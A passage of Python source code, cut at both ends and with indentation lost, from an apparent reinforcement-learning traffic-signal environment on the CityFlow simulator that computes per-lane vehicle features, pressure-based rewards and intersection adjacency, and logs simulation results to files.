if vehicle not in self.dic_vehicle_arrive_leave_time:
self.dic_vehicle_arrive_leave_time[vehicle] = \
{"enter_time": ts, "leave_time": np.nan}
else:
# print("vehicle: %s already exists in entering lane!"%vehicle)
# sys.exit(-1)
pass
def _update_left_time(self, list_vehicle_left, path_to_log):
ts = self.get_current_time()
# update the time for vehicle to leave entering lane
for vehicle in list_vehicle_left:
try:
self.dic_vehicle_arrive_leave_time[vehicle]["leave_time"] = ts
## TODO log one vehicle and then pop
self.log_one_vehicle(vehicle, path_to_log)
self.dic_vehicle_arrive_leave_time.pop(vehicle)
except KeyError:
print("vehicle not recorded when entering")
sys.exit(-1)
def log_one_vehicle(self, vehicle, path_to_log):
inter = str(self.inter_id[0]) + '_' + str(self.inter_id[1])
path_to_log_file = os.path.join(path_to_log, "vehicle_inter_{0}.csv".format(inter))
df = [vehicle, self.dic_vehicle_arrive_leave_time[vehicle]["enter_time"],
self.dic_vehicle_arrive_leave_time[vehicle]["leave_time"]]
df = pd.DataFrame(df)
df = df.transpose()
df.to_csv(path_to_log_file, mode='a', header=False, index=False)
def _update_feature(self):
dic_feature = dict()
dic_feature["cur_phase"] = [self.current_phase_index]
dic_feature["time_this_phase"] = [self.current_phase_duration]
dic_feature["vehicle_position_img"] = None # self._get_lane_vehicle_position(self.list_entering_lanes)
dic_feature["vehicle_speed_img"] = None # self._get_lane_vehicle_speed(self.list_entering_lanes)
dic_feature["vehicle_acceleration_img"] = None
dic_feature[
"vehicle_waiting_time_img"] = None # self._get_lane_vehicle_accumulated_waiting_time(self.list_entering_lanes)
dic_feature["lane_num_vehicle"] = self._get_lane_num_vehicle(self.list_entering_lanes)
dic_feature["lane_num_vehicle_downstream"] = self._get_lane_num_vehicle(self.list_exiting_lanes)
dic_feature["coming_vehicle"] = self._get_coming_vehicles()
dic_feature["leaving_vehicle"] = self._get_leaving_vehicles()
dic_feature["pressure"] = self._get_pressure()
dic_feature["adjacency_matrix"] = None # self._get_adjacency_row()
def update_neighbor_info(self, neighbors, dic_feature):
# print(dic_feature)
none_dic_feature = deepcopy(dic_feature)
for key in none_dic_feature.keys():
if none_dic_feature[key] is not None:
if "cur_phase" in key:
none_dic_feature[key] = [1] * len(none_dic_feature[key])
elif "num_total_veh" in key:
none_dic_feature[key] = []
else:
none_dic_feature[key] = [0] * len(none_dic_feature[key])
else:
none_dic_feature[key] = None
for i in range(len(neighbors)):
neighbor = neighbors[i]
example_dic_feature = {}
if neighbor is None:
example_dic_feature["cur_phase_{0}".format(i)] = none_dic_feature["cur_phase"]
example_dic_feature["time_this_phase_{0}".format(i)] = none_dic_feature["time_this_phase"]
example_dic_feature["lane_num_vehicle_{0}".format(i)] = none_dic_feature["lane_num_vehicle"]
example_dic_feature["lane_num_vehicle_downstream_{0}".format(i)] = none_dic_feature[
"lane_num_vehicle_downstream"]
else:
example_dic_feature["cur_phase_{0}".format(i)] = neighbor.dic_feature["cur_phase"]
example_dic_feature["time_this_phase_{0}".format(i)] = neighbor.dic_feature["time_this_phase"]
example_dic_feature["lane_num_vehicle_{0}".format(i)] = neighbor.dic_feature["lane_num_vehicle"]
example_dic_feature["lane_num_vehicle_downstream_{0}".format(i)] = neighbor.dic_feature[
"lane_num_vehicle_downstream"]
dic_feature.update(example_dic_feature)
return dic_feature
@staticmethod
def _add_suffix_to_dict_key(target_dict, suffix):
keys = list(target_dict.keys())
for key in keys:
target_dict[key + "_" + suffix] = target_dict.pop(key)
return target_dict
def _update_feature_map(self, simulator_state, test_flag):
dic_feature = dict()
dic_feature["cur_phase"] = [self.current_phase_index]
dic_feature["time_this_phase"] = [self.current_phase_duration]
dic_feature["vehicle_position_img"] = None # self._get_lane_vehicle_position(self.list_entering_lanes)
dic_feature["vehicle_speed_img"] = None # self._get_lane_vehicle_speed(self.list_entering_lanes)
dic_feature["vehicle_acceleration_img"] = None
dic_feature[
"vehicle_waiting_time_img"] = None # self._get_lane_vehicle_accumulated_waiting_time(self.list_entering_lanes)
dic_feature["lane_num_vehicle"] = self._get_lane_num_vehicle(self.list_entering_lanes)
dic_feature["lane_num_vehicle_downstream"] = self._get_lane_num_vehicle_downstream(simulator_state)
dic_feature["delta_lane_num_vehicle"] = [
dic_feature["lane_num_vehicle"][i] - dic_feature["lane_num_vehicle_downstream"][i] for i in
range(len(dic_feature["lane_num_vehicle_downstream"]))]
# dic_feature["pressure"] = None # [self._get_pressure()]
if self.fast_compute or test_flag:
dic_feature["coming_vehicle"] = None
dic_feature["leaving_vehicle"] = None
# dic_feature["num_total_veh"] = simulator_state['num_total_veh']
else:
dic_feature["coming_vehicle"] = self._get_coming_vehicles(simulator_state)
dic_feature["leaving_vehicle"] = self._get_leaving_vehicles(simulator_state)
# print(simulator_state['num_total_veh'])
dic_feature["num_total_veh"] = simulator_state['num_total_veh']
dic_feature["pressure"] = self._get_pressure()
dic_feature[
"lane_num_vehicle_been_stopped_thres01"] = None # self._get_lane_num_vehicle_been_stopped(0.1, self.list_entering_lanes)
dic_feature["lane_num_vehicle_been_stopped_thres1"] = self._get_lane_num_vehicle_been_stopped(1,
self.list_entering_lanes)
dic_feature["lane_queue_length"] = None # self._get_lane_queue_length(self.list_entering_lanes)
dic_feature["lane_num_vehicle_left"] = None
dic_feature["lane_sum_duration_vehicle_left"] = None
dic_feature["lane_sum_waiting_time"] = None # self._get_lane_sum_waiting_time(self.list_entering_lanes)
dic_feature["terminal"] = None
dic_feature["adjacency_matrix"] = self._get_adjacency_row()
self.dic_feature = dic_feature
def _get_adjacency_row(self):
return self.adjacency_row
def lane_position_mapper(self, lane_pos, bins):
lane_pos_np = np.array(lane_pos)
digitized = np.digitize(lane_pos_np, bins)
position_counter = [len(lane_pos_np[digitized == i]) for i in range(1, len(bins))]
return position_counter
def _get_coming_vehicles(self, simulator_state):
coming_distribution = []
lane_vid_mapping_dict = simulator_state['get_lane_vehicles']
vid_distance_mapping_dict = simulator_state['get_vehicle_distance']
bins = np.linspace(0, 300, 4).tolist()
for lane in self.list_entering_lanes:
coming_vehicle_position = []
vehicle_position_lane = lane_vid_mapping_dict[lane]
for vehicle in vehicle_position_lane:
coming_vehicle_position.append(vid_distance_mapping_dict[vehicle])
coming_distribution.extend(self.lane_position_mapper(coming_vehicle_position, bins))
return coming_distribution
def _get_leaving_vehicles(self, simulator_state):
leaving_distribution = []
## dimension = num_lane*3*num_list_entering_lanes
lane_vid_mapping_dict = simulator_state['get_lane_vehicles']
vid_distance_mapping_dict = simulator_state['get_vehicle_distance']
## TODO LANE LENGTH = 300
bins = np.linspace(0, 300, 4).tolist()
for lane in self.list_exiting_lanes:
coming_vehicle_position = []
vehicle_position_lane = lane_vid_mapping_dict[lane]
for vehicle in vehicle_position_lane:
coming_vehicle_position.append(vid_distance_mapping_dict[vehicle])
leaving_distribution.extend(self.lane_position_mapper(coming_vehicle_position, bins))
return leaving_distribution
def _get_pressure(self):
return [self.dic_lane_waiting_vehicle_count_current_step[lane] for lane in self.list_entering_lanes] + \
[-self.dic_lane_waiting_vehicle_count_current_step[lane] for lane in self.list_exiting_lanes]
def _get_lane_queue_length(self, list_lanes):
'''
queue length for each lane
'''
return [self.dic_lane_waiting_vehicle_count_current_step[lane] for lane in list_lanes]
def _get_lane_num_vehicle(self, list_lanes):
'''
vehicle number for each lane
'''
return [len(self.dic_lane_vehicle_current_step[lane]) for lane in list_lanes]
def _get_lane_num_vehicle_downstream(self, simulator_state):
'''
vehicle number for each lane
'''
lane_vid_mapping_dict = simulator_state['get_lane_vehicles']
return [len(lane_vid_mapping_dict[lane]) for lane in self.list_exiting_lanes]
def _get_lane_sum_waiting_time(self, list_lanes):
'''
waiting time for each lane
'''
raise NotImplementedError
def _get_lane_list_vehicle_left(self, list_lanes):
'''
get list of vehicles left at each lane
####### need to check
'''
raise NotImplementedError
# non temporary
def _get_lane_num_vehicle_left(self, list_lanes):
list_lane_vehicle_left = self._get_lane_list_vehicle_left(list_lanes)
list_lane_num_vehicle_left = [len(lane_vehicle_left) for lane_vehicle_left in list_lane_vehicle_left]
return list_lane_num_vehicle_left
def _get_lane_sum_duration_vehicle_left(self, list_lanes):
## not implemented error
raise NotImplementedError
def _get_lane_num_vehicle_been_stopped(self, thres, list_lanes):
return [self.dic_lane_waiting_vehicle_count_current_step[lane] for lane in list_lanes]
def _get_lane_vehicle_position(self, list_lanes):
list_lane_vector = []
for lane in list_lanes:
lane_vector = np.zeros(self.num_grid)
list_vec_id = self.dic_lane_vehicle_current_step[lane]
for vec in list_vec_id:
pos = int(self.dic_vehicle_distance_current_step[vec])
pos_grid = min(pos // self.length_grid, self.num_grid)
lane_vector[pos_grid] = 1
list_lane_vector.append(lane_vector)
return np.array(list_lane_vector)
# debug
def _get_vehicle_info(self, veh_id):
try:
pos = self.dic_vehicle_distance_current_step[veh_id]
speed = self.dic_vehicle_speed_current_step[veh_id]
return pos, speed
except:
return None, None
def _get_lane_vehicle_speed(self, list_lanes):
return [self.dic_vehicle_speed_current_step[lane] for lane in list_lanes]
def _get_lane_vehicle_accumulated_waiting_time(self, list_lanes):
raise NotImplementedError
# ================= get functions from outside ======================
def get_current_time(self):
return self.eng.get_current_time()
def get_dic_vehicle_arrive_leave_time(self):
return self.dic_vehicle_arrive_leave_time
def get_feature(self):
return self.dic_feature
def get_state(self, list_state_features):
dic_state = {state_feature_name: self.dic_feature[state_feature_name] for state_feature_name in
list_state_features}
return dic_state
def get_reward(self, dic_reward_info):
dic_reward = dict()
dic_reward["flickering"] = None
dic_reward["sum_lane_queue_length"] = None
dic_reward["sum_lane_wait_time"] = None
dic_reward["sum_lane_num_vehicle_left"] = None
dic_reward["sum_duration_vehicle_left"] = None
dic_reward["sum_num_vehicle_been_stopped_thres01"] = None
dic_reward["sum_num_vehicle_been_stopped_thres1"] = np.sum(
self.dic_feature["lane_num_vehicle_been_stopped_thres1"])
dic_reward['pressure'] = np.absolute(np.sum(self.dic_feature["pressure"]))
reward = 0
for r in dic_reward_info:
if dic_reward_info[r] != 0:
reward += dic_reward_info[r] * dic_reward[r]
return reward
class AnonEnv:
list_intersection_id = [
"intersection_1_1"
]
def __init__(self, path_to_log, path_to_work_directory, dic_traffic_env_conf):
self.path_to_log = path_to_log
self.path_to_work_directory = path_to_work_directory
self.dic_traffic_env_conf = dic_traffic_env_conf
self.simulator_type = self.dic_traffic_env_conf["SIMULATOR_TYPE"]
self.list_intersection = None
self.list_inter_log = None
self.list_lanes = None
self.system_states = None
self.feature_name_for_neighbor = self._reduce_duplicates(self.dic_traffic_env_conf["LIST_STATE_FEATURE"])
# check min action time
if self.dic_traffic_env_conf["MIN_ACTION_TIME"] <= self.dic_traffic_env_conf["YELLOW_TIME"]:
print("MIN_ACTION_TIME should include YELLOW_TIME")
pass
# raise ValueError
# touch new inter_{}.pkl (if exists, remove)
for inter_ind in range(self.dic_traffic_env_conf["NUM_INTERSECTIONS"]):
path_to_log_file = os.path.join(self.path_to_log, "inter_{0}.pkl".format(inter_ind))
f = open(path_to_log_file, "wb")
f.close()
def reset(self):
# self.eng.reset() to be implemented
# self.eng = engine.Engine(self.dic_traffic_env_conf["INTERVAL"],
# self.dic_traffic_env_conf["THREADNUM"],
# self.dic_traffic_env_conf["SAVEREPLAY"],
# self.dic_traffic_env_conf["RLTRAFFICLIGHT"],
# False,
# 0)
# self.load_roadnet(self.dic_traffic_env_conf["ROADNET_FILE"])
# self.load_flow(self.dic_traffic_env_conf["TRAFFIC_FILE"])
get_cityflow_config(self.dic_traffic_env_conf["INTERVAL"],
0,
self.path_to_work_directory+'/',
# "./data/template_lsr/1_6/",
self.dic_traffic_env_conf["ROADNET_FILE"],
self.dic_traffic_env_conf["TRAFFIC_FILE"],
self.dic_traffic_env_conf["RLTRAFFICLIGHT"],
self.dic_traffic_env_conf["SAVEREPLAY"],
'roadnet.json',
'replay.txt')
self.eng = cityflow.Engine("./config/cityflow_config.json", self.dic_traffic_env_conf["THREADNUM"])
# get adjacency
self.traffic_light_node_dict = self._adjacency_extraction()
# initialize intersections (grid)
self.list_intersection = [Intersection((i + 1, j + 1), self.dic_traffic_env_conf, self.eng,
self.traffic_light_node_dict[
"intersection_{0}_{1}".format(i + 1, j + 1)])
for i in range(self.dic_traffic_env_conf["NUM_ROW"])
for j in range(self.dic_traffic_env_conf["NUM_COL"])]
self.list_inter_log = [[] for i in range(self.dic_traffic_env_conf["NUM_ROW"] *
self.dic_traffic_env_conf["NUM_COL"])]
self.id_to_index = {}
count = 0
for i in range(self.dic_traffic_env_conf["NUM_ROW"]):
for j in range(self.dic_traffic_env_conf["NUM_COL"]):
self.id_to_index['intersection_{0}_{1}'.format(i + 1, j + 1)] = count
count += 1
self.list_lanes = []
for inter in self.list_intersection:
self.list_lanes += inter.list_lanes
self.list_lanes = np.unique(self.list_lanes).tolist()
# print(self.list_lanes)
# get new measurements
system_state_start_time = time.time()
if self.dic_traffic_env_conf["FAST_COMPUTE"]:
self.system_states = {"get_lane_vehicles": self.eng.get_lane_vehicles(),
"get_lane_waiting_vehicle_count": self.eng.get_lane_waiting_vehicle_count(),
"get_vehicle_speed": None,
"get_vehicle_distance": None
}
else:
self.system_states = {"get_lane_vehicles": self.eng.get_lane_vehicles(),
"get_lane_waiting_vehicle_count": self.eng.get_lane_waiting_vehicle_count(),
"get_vehicle_speed": None, # self.eng.get_vehicle_speed(),
"get_vehicle_distance": self.eng.get_vehicle_distance(),
# "num_total_veh": np.sum([self.system_states["get_lane_vehicles"][lane] for lane in self.list_lanes])
}
self.system_states["num_total_veh"] = np.sum(
[len(self.system_states["get_lane_vehicles"][lane]) for lane in self.list_lanes])
update_start_time = time.time()
for inter in self.list_intersection:
inter.update_current_measurements_map(self.system_states, self.path_to_log, False)
# print("Update_current_measurements_map time: ", time.time()-update_start_time)
# update neighbor's info
neighbor_start_time = time.time()
if self.dic_traffic_env_conf["NEIGHBOR"]:
for inter in self.list_intersection:
neighbor_inter_ids = inter.neighbor_ENWS
neighbor_inters = []
for neighbor_inter_id in neighbor_inter_ids:
if neighbor_inter_id is not None:
neighbor_inters.append(self.list_intersection[self.id_to_index[neighbor_inter_id]])
else:
neighbor_inters.append(None)
inter.dic_feature = inter.update_neighbor_info(neighbor_inters, deepcopy(inter.dic_feature))
state, done = self.get_state()
return state
def reset_test(self):
get_cityflow_config(self.dic_traffic_env_conf["INTERVAL"],
0,
self.path_to_work_directory+'/',
# "./data/template_lsr/1_6/",
self.dic_traffic_env_conf["ROADNET_FILE"],
self.dic_traffic_env_conf["TRAFFIC_FILE"],
self.dic_traffic_env_conf["RLTRAFFICLIGHT"],
self.dic_traffic_env_conf["SAVEREPLAY"],
'roadnet.json',
'replay.txt')
self.eng = cityflow.Engine("./config/cityflow_config.json", self.dic_traffic_env_conf["THREADNUM"])
# get adjacency
self.traffic_light_node_dict = self._adjacency_extraction()
# initialize intersections (grid)
self.list_intersection = [Intersection((i + 1, j + 1), self.dic_traffic_env_conf, self.eng,
self.traffic_light_node_dict[
"intersection_{0}_{1}".format(i + 1, j + 1)])
for i in range(self.dic_traffic_env_conf["NUM_ROW"])
for j in range(self.dic_traffic_env_conf["NUM_COL"])]
self.list_inter_log = [[] for i in range(self.dic_traffic_env_conf["NUM_ROW"] *
self.dic_traffic_env_conf["NUM_COL"])]
# get lanes list
self.list_lanes = []
for inter in self.list_intersection:
self.list_lanes += inter.list_lanes
self.list_lanes = np.unique(self.list_lanes).tolist()
# get new measurements
system_state_start_time = time.time()
if self.dic_traffic_env_conf["FAST_COMPUTE"]:
self.system_states = {"get_lane_vehicles": self.eng.get_lane_vehicles(),
"get_lane_waiting_vehicle_count": self.eng.get_lane_waiting_vehicle_count(),
"get_vehicle_speed": None,
"get_vehicle_distance": None
}
else:
self.system_states = {"get_lane_vehicles": self.eng.get_lane_vehicles(),
"get_lane_waiting_vehicle_count": self.eng.get_lane_waiting_vehicle_count(),
"get_vehicle_speed": self.eng.get_vehicle_speed(),
"get_vehicle_distance": self.eng.get_vehicle_distance(),
# "num_total_veh": np.sum([self.system_states["get_lane_vehicles"][lane] for lane in self.list_lanes])
}
self.system_states["num_total_veh"] = np.sum(
[len(self.system_states["get_lane_vehicles"][lane]) for lane in self.list_lanes])
update_start_time = time.time()
for inter in self.list_intersection:
inter.update_current_measurements_map(self.system_states, self.path_to_log, False)
# print("Update_current_measurements_map time: ", time.time()-update_start_time)
# update neighbor's info
neighbor_start_time = time.time()
if self.dic_traffic_env_conf["NEIGHBOR"]:
for inter in self.list_intersection:
neighbor_inter_ids = inter.neighbor_ENWS
neighbor_inters = []
for neighbor_inter_id in neighbor_inter_ids:
if neighbor_inter_id is not None:
neighbor_inters.append(self.list_intersection[self.id_to_index[neighbor_inter_id]])
else:
neighbor_inters.append(None)
inter.dic_feature = inter.update_neighbor_info(neighbor_inters, deepcopy(inter.dic_feature))
state, done = self.get_state()
# print(state)
return state
def step(self, action, test_flag):
step_start_time = time.time()
list_action_in_sec = [action]
list_action_in_sec_display = [action]
for i in range(self.dic_traffic_env_conf["MIN_ACTION_TIME"] - 1):
if self.dic_traffic_env_conf["ACTION_PATTERN"] == "switch":
list_action_in_sec.append(np.zeros_like(action).tolist())
elif self.dic_traffic_env_conf["ACTION_PATTERN"] == "set":
list_action_in_sec.append(np.copy(action).tolist())
list_action_in_sec_display.append(np.full_like(action, fill_value=-1).tolist())
average_reward_action_list = [0] * len(action)
for i in range(self.dic_traffic_env_conf["MIN_ACTION_TIME"]):
action_in_sec = list_action_in_sec[i]
action_in_sec_display = list_action_in_sec_display[i]
instant_time = self.get_current_time()
self.current_time = self.get_current_time()
before_action_feature = self.get_feature()
# state = self.get_state()
if self.dic_traffic_env_conf['DEBUG']:
print("time: {0}".format(instant_time))
else:
if i == 0:
print("time: {0}".format(instant_time))
self._inner_step(action_in_sec, test_flag)
# get reward
if self.dic_traffic_env_conf['DEBUG']:
start_time = time.time()
reward = self.get_reward()
if self.dic_traffic_env_conf['DEBUG']:
print("Reward time: {}".format(time.time() - start_time))
for j in range(len(reward)):
average_reward_action_list[j] = (average_reward_action_list[j] * i + reward[j]) / (i + 1)
# log
self.log(cur_time=instant_time, before_action_feature=before_action_feature, action=action_in_sec_display)
next_state, done = self.get_state()
print("Step time: ", time.time() - step_start_time)
return next_state, reward, done, average_reward_action_list
def _inner_step(self, action, test_flag):
# copy current measurements to previous measurements
for inter in self.list_intersection:
inter.update_previous_measurements()
# set signals
# multi_intersection decided by action {inter_id: phase}
for inter_ind, inter in enumerate(self.list_intersection):
inter.set_signal(
action=action[inter_ind],
action_pattern=self.dic_traffic_env_conf["ACTION_PATTERN"],
yellow_time=self.dic_traffic_env_conf["YELLOW_TIME"],
all_red_time=self.dic_traffic_env_conf["ALL_RED_TIME"]
)
# run one step
for i in range(int(1 / self.dic_traffic_env_conf["INTERVAL"])):
self.eng.next_step()
if self.dic_traffic_env_conf['DEBUG']:
start_time = time.time()
system_state_start_time = time.time()
if self.dic_traffic_env_conf["FAST_COMPUTE"] or test_flag:
self.system_states = {"get_lane_vehicles": self.eng.get_lane_vehicles(),
"get_lane_waiting_vehicle_count": self.eng.get_lane_waiting_vehicle_count(),
"get_vehicle_speed": None,
"get_vehicle_distance": None
}
else:
self.system_states = {"get_lane_vehicles": self.eng.get_lane_vehicles(),
"get_lane_waiting_vehicle_count": self.eng.get_lane_waiting_vehicle_count(),
"get_vehicle_speed": None, # self.eng.get_vehicle_speed(),
"get_vehicle_distance": self.eng.get_vehicle_distance()
}
self.system_states["num_total_veh"] = np.sum(
[len(self.system_states["get_lane_vehicles"][lane]) for lane in self.list_lanes])
if self.dic_traffic_env_conf['DEBUG']:
print("Get system state time: {}".format(time.time() - start_time))
# get new measurements
if self.dic_traffic_env_conf['DEBUG']:
start_time = time.time()
update_start_time = time.time()
for inter in self.list_intersection:
inter.update_current_measurements_map(self.system_states, self.path_to_log, test_flag)
# update neighbor's info
if self.dic_traffic_env_conf["NEIGHBOR"]:
for inter in self.list_intersection:
neighbor_inter_ids = inter.neighbor_ENWS
neighbor_inters = []
for neighbor_inter_id in neighbor_inter_ids:
if neighbor_inter_id is not None:
neighbor_inters.append(self.list_intersection[self.id_to_index[neighbor_inter_id]])
else:
neighbor_inters.append(None)
inter.dic_feature = inter.update_neighbor_info(neighbor_inters, deepcopy(inter.dic_feature))
if self.dic_traffic_env_conf['DEBUG']:
print("Update measurements time: {}".format(time.time() - start_time))
# self.log_lane_vehicle_position()
# self.log_first_vehicle()
# self.log_phase()
def load_roadnet(self, roadnetFile=None):
print("Start load roadnet")
start_time = time.time()
if not roadnetFile:
roadnetFile = "roadnet_1_1.json"
self.eng.load_roadnet(os.path.join(self.path_to_work_directory, roadnetFile))
print("successfully load roadnet:{0}, time: {1}".format(roadnetFile, time.time() - start_time))
def load_flow(self, flowFile=None):
print("Start load flowFile")
start_time = time.time()
if not flowFile:
flowFile = "flow_1_1.json"
self.eng.load_flow(os.path.join(self.path_to_work_directory, flowFile))
print("successfully load flowFile: {0}, time: {1}".format(flowFile, time.time() - start_time))
def _check_episode_done(self, list_state):
# ======== to implement ========
return False
@staticmethod
def convert_dic_to_df(dic):
list_df = []
for key in dic:
df = pd.Series(dic[key], name=key)
list_df.append(df)
return pd.DataFrame(list_df)
def get_feature(self):
list_feature = [inter.get_feature() for inter in self.list_intersection]
return list_feature
def get_state(self):
# consider neighbor info
list_state = [inter.get_state(self.dic_traffic_env_conf["LIST_STATE_FEATURE"]) for inter in
self.list_intersection]
done = self._check_episode_done(list_state)
return list_state, done
@staticmethod
def _reduce_duplicates(feature_name_list):
new_list = set()
for feature_name in feature_name_list:
if feature_name[-1] in ["0", "1", "2", "3"]:
new_list.add(feature_name[:-2])
return list(new_list)
def get_reward(self):
list_reward = [inter.get_reward(self.dic_traffic_env_conf["DIC_REWARD_INFO"]) for inter in
self.list_intersection]
return list_reward
def get_current_time(self):
return self.eng.get_current_time()
def log(self, cur_time, before_action_feature, action):
for inter_ind in range(len(self.list_intersection)):
self.list_inter_log[inter_ind].append({"time": cur_time,
"state": before_action_feature[inter_ind],
"action": action[inter_ind]})
def batch_log(self, start, stop):
for inter_ind in range(start, stop):
path_to_log_file = os.path.join(self.path_to_log, "inter_{0}.pkl".format(inter_ind))
f = open(path_to_log_file, "wb")
pickle.dump(self.list_inter_log[inter_ind], f)
f.close()
vol = get_traffic_volume(self.dic_traffic_env_conf["TRAFFIC_FILE"])
self.eng.print_log(os.path.join(self.path_to_log, self.dic_traffic_env_conf["ROADNET_FILE"]),
os.path.join(self.path_to_log, "replay_1_1_%s.txt" % vol))
def bulk_log_multi_process(self, batch_size=100):
assert len(self.list_intersection) == len(self.list_inter_log)
if batch_size > len(self.list_intersection):
batch_size_run = len(self.list_intersection)
else:
batch_size_run = batch_size
process_list = []
for batch in range(0, len(self.list_intersection), batch_size_run):
start = batch
stop = min(batch + batch_size, len(self.list_intersection))
p = Process(target=self.batch_log, args=(start, stop))
print("before")
p.start()
print("end")
process_list.append(p)
print("before join")
for t in process_list:
t.join()
f = open(os.path.join(self.path_to_log, "log_done.txt"), "a")
f.close()
def bulk_log(self):
for inter_ind in range(len(self.list_intersection)):
path_to_log_file = os.path.join(self.path_to_log, "vehicle_inter_{0}.csv".format(inter_ind))
dic_vehicle = self.list_intersection[inter_ind].get_dic_vehicle_arrive_leave_time()
df = self.convert_dic_to_df(dic_vehicle)
df.to_csv(path_to_log_file, na_rep="nan")
for inter_ind in range(len(self.list_inter_log)):
path_to_log_file = os.path.join(self.path_to_log, "inter_{0}.pkl".format(inter_ind))
f = open(path_to_log_file, "wb")
pickle.dump(self.list_inter_log[inter_ind], f)
f.close()
vol = get_traffic_volume(self.dic_traffic_env_conf["TRAFFIC_FILE"])
self.eng.print_log(os.path.join(self.path_to_log, self.dic_traffic_env_conf["ROADNET_FILE"]),
os.path.join(self.path_to_log, "replay_1_1_%s.txt" % vol))
def log_attention(self, attention_dict):
path_to_log_file = os.path.join(self.path_to_log, "attention.pkl")
f = open(path_to_log_file, "wb")
pickle.dump(attention_dict, f)
f.close()
def log_hidden_state(self, hidden_states):
path_to_log_file = os.path.join(self.path_to_log, "hidden_states.pkl")
with open(path_to_log_file, "wb") as f:
pickle.dump(hidden_states, f)
def log_lane_vehicle_position(self):
def list_to_str(alist):
new_str = ""
for s in alist:
new_str = new_str + str(s) + " "
return new_str
dic_lane_map = {
"road_0_1_0_0": "w",
"road_2_1_2_0": "e",
"road_1_0_1_0": "s",
"road_1_2_3_0": "n"
}
for inter in self.list_intersection:
for lane in inter.list_entering_lanes:
print(str(self.get_current_time()) + ", " + lane + ", " + list_to_str(
inter._get_lane_vehicle_position([lane])[0]),
file=open(os.path.join(self.path_to_log, "lane_vehicle_position_%s.txt" % dic_lane_map[lane]),
"a"))
def log_lane_vehicle_position(self):
def list_to_str(alist):
new_str = ""
for s in alist:
new_str = new_str + str(s) + " "
return new_str
dic_lane_map = {
"road_0_1_0_0": "w",
"road_2_1_2_0": "e",
"road_1_0_1_0": "s",
"road_1_2_3_0": "n"
}
for inter in self.list_intersection:
for lane in inter.list_entering_lanes:
print(str(self.get_current_time()) + ", " + lane + ", " + list_to_str(
inter._get_lane_vehicle_position([lane])[0]),
file=open(os.path.join(self.path_to_log, "lane_vehicle_position_%s.txt" % dic_lane_map[lane]),
"a"))
def log_first_vehicle(self):
_veh_id = "flow_0_"
_veh_id_2 = "flow_2_"
_veh_id_3 = "flow_4_"
_veh_id_4 = "flow_6_"
for inter in self.list_intersection:
for i in range(100):
veh_id = _veh_id + str(i)
veh_id_2 = _veh_id_2 + str(i)
pos, speed = inter._get_vehicle_info(veh_id)
pos_2, speed_2 = inter._get_vehicle_info(veh_id_2)
# print(i, veh_id, pos, veh_id_2, speed, pos_2, speed_2)
if not os.path.exists(os.path.join(self.path_to_log, "first_vehicle_info_a")):
os.makedirs(os.path.join(self.path_to_log, "first_vehicle_info_a"))
if not os.path.exists(os.path.join(self.path_to_log, "first_vehicle_info_b")):
os.makedirs(os.path.join(self.path_to_log, "first_vehicle_info_b"))
if pos and speed:
print("%f, %f, %f" % (self.get_current_time(), pos, speed),
file=open(
os.path.join(self.path_to_log, "first_vehicle_info_a", "first_vehicle_info_a_%d.txt" % i),
"a"))
if pos_2 and speed_2:
print("%f, %f, %f" % (self.get_current_time(), pos_2, speed_2),
file=open(
os.path.join(self.path_to_log, "first_vehicle_info_b", "first_vehicle_info_b_%d.txt" % i),
"a"))
veh_id_3 = _veh_id_3 + str(i)
veh_id_4 = _veh_id_4 + str(i)
pos_3, speed_3 = inter._get_vehicle_info(veh_id_3)
pos_4, speed_4 = inter._get_vehicle_info(veh_id_4)
# print(i, veh_id, pos, veh_id_2, speed, pos_2, speed_2)
if not os.path.exists(os.path.join(self.path_to_log, "first_vehicle_info_c")):
os.makedirs(os.path.join(self.path_to_log, "first_vehicle_info_c"))
if not os.path.exists(os.path.join(self.path_to_log, "first_vehicle_info_d")):
os.makedirs(os.path.join(self.path_to_log, "first_vehicle_info_d"))
if pos_3 and speed_3:
print("%f, %f, %f" % (self.get_current_time(), pos_3, speed_3),
file=open(
os.path.join(self.path_to_log, "first_vehicle_info_c", "first_vehicle_info_a_%d.txt" % i),
"a"))
if pos_4 and speed_4:
print("%f, %f, %f" % (self.get_current_time(), pos_4, speed_4),
file=open(
os.path.join(self.path_to_log, "first_vehicle_info_d", "first_vehicle_info_b_%d.txt" % i),
"a"))
def log_phase(self):
for inter in self.list_intersection:
print("%f, %f" % (self.get_current_time(), inter.current_phase_index),
file=open(os.path.join(self.path_to_log, "log_phase.txt"), "a"))
def _adjacency_extraction(self):
traffic_light_node_dict = {}
file = os.path.join(self.path_to_work_directory, self.dic_traffic_env_conf["ROADNET_FILE"])
with open('{0}'.format(file)) as json_data:
net = json.load(json_data)
# print(net)
for inter in net['intersections']:
if not inter['virtual']:
traffic_light_node_dict[inter['id']] = {'location': {'x': float(inter['point']['x']),
'y': float(inter['point']['y'])},
"total_inter_num": None, 'adjacency_row': None,
"inter_id_to_index": None,
"neighbor_ENWS": None}
top_k = self.dic_traffic_env_conf["TOP_K_ADJACENCY"]
total_inter_num = len(traffic_light_node_dict.keys())
inter_id_to_index = {}
edge_id_dict = {}
for road in net['roads']:
if road['id'] not in edge_id_dict.keys():
edge_id_dict[road['id']] = {}
edge_id_dict[road['id']]['from'] = road['startIntersection']
edge_id_dict[road['id']]['to'] = road['endIntersection']
index = 0
for i in traffic_light_node_dict.keys():
inter_id_to_index[i] = index
index += 1
for i in traffic_light_node_dict.keys():
location_1 = traffic_light_node_dict[i]['location']
row = np.array([0] * total_inter_num)
# row = np.zeros((self.dic_traffic_env_conf["NUM_ROW"],self.dic_traffic_env_conf["NUM_col"]))
for j in traffic_light_node_dict.keys():
location_2 = traffic_light_node_dict[j]['location']
dist = AnonEnv._cal_distance(location_1, location_2)
row[inter_id_to_index[j]] = dist
if len(row) == top_k:
adjacency_row_unsorted = np.argpartition(row, -1)[:top_k].tolist()
elif len(row) > top_k:
adjacency_row_unsorted = np.argpartition(row, top_k)[:top_k].tolist()
else:
adjacency_row_unsorted = [k for k in range(total_inter_num)]
adjacency_row_unsorted.remove(inter_id_to_index[i])
traffic_light_node_dict[i]['adjacency_row'] = [inter_id_to_index[i]] + adjacency_row_unsorted
traffic_light_node_dict[i]['total_inter_num'] = total_inter_num
for i in traffic_light_node_dict.keys():
traffic_light_node_dict[i]['total_inter_num'] = inter_id_to_index
traffic_light_node_dict[i]['neighbor_ENWS'] = []
for j in range(4):
road_id = i.replace("intersection", "road") + "_" + str(j)
if edge_id_dict[road_id]['to'] not in traffic_light_node_dict.keys():
traffic_light_node_dict[i]['neighbor_ENWS'].append(None)
else:
